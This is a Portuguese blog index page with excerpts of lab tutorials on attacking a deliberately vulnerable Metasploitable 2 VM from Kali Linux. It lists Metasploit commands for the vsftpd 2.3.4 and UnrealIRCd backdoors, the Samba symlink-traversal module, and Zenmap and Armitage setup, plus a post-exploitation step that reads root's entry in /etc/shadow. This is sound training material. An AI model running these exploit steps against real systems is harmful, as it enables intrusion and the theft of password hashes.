Utilizando o zenmap com Kali Linux e Servidor Metaploitable 2

Siga as instruções abaixo: 1. Verifique se as VMs do Kali Linux e do Metasploitable 2 estão na mesma rede virtual. 2. Configure um endereço IPv4 através do comando “ifconfig” em cada uma das VMs. 3. Na VM Kali Linux digite “zenmap” no terminal, ou, na barra de Aplicativos vá para: “Information Gathering” -> zenmap.… Continuar lendo Utilizando o zenmap com Kali Linux e Servidor Metaploitable 2

Comandos do Metasploit para um backdoor através do vsftp

Neste caso o alvo é servidor Metasploitable 2 utilizando Kali Linux. As instruções seguem abaixo: msfconsole msf > search vsftpd msf > use exploit/unix/ftp/vsftpd_234_backdoor msf > show options msf > set RHOST 192.168.56.101 msf > exploit whoami hostname grep root /etc/shadow Obs.: O mesmo pode ser feito com o exploit abaixo: msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

Um exemplo de utilização do Armitage

Siga as instruções abaixo: 1. Inicie o Kali Linux e servidor Metasploitable 2 em rede virtual. 2. No terminal do Kali Linux digite em sequência os comandos: service postgresqls start   msfconsole 3. No metasploit (msfconsole) digite o comando “db_status”. Se a saída for diferente de “[*] postgresql connected to msf” encerre o aplicativo (comando… Continuar lendo Um exemplo de utilização do Armitage

Comandos do Metasploit para um Backdoor através do Samba

No terminal do Kali Linux, digite: msfconsole msf > use auxiliary/admin/smb/samba_symlink_traversal msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.56.101 msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp msf auxiliary(samba_symlink_traversal) > exploit 2. Por fim, um exemplo de acesso com smbclient para informações sobre o Samba para e navegar na máquina alvo: smbclient //192.168.99.131/tmp smb: \> cd rootfs smb: \rootfs\>… Continuar lendo Comandos do Metasploit para um Backdoor através do Samba